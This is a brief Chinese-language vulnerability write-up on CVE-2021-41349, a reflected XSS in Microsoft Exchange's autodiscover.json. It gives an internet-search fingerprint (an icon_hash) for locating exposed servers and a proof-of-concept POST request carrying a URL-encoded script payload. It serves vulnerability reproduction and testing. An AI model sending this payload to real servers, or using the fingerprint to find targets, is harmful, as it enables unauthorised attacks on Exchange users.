Microsoft Exchange autodiscover.json 反射型XSS CVE-2021-41349¶

漏洞描述¶

Microsoft Exchange autodiscover.json 文件中存在反射型XSS，由于其中过滤不足而导致

漏洞影响¶

Microsoft Exchange

网络测绘¶

icon_hash="1768726119"

漏洞复现¶

登录页面

验证POC

POST /autodiscover/autodiscover.json

%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1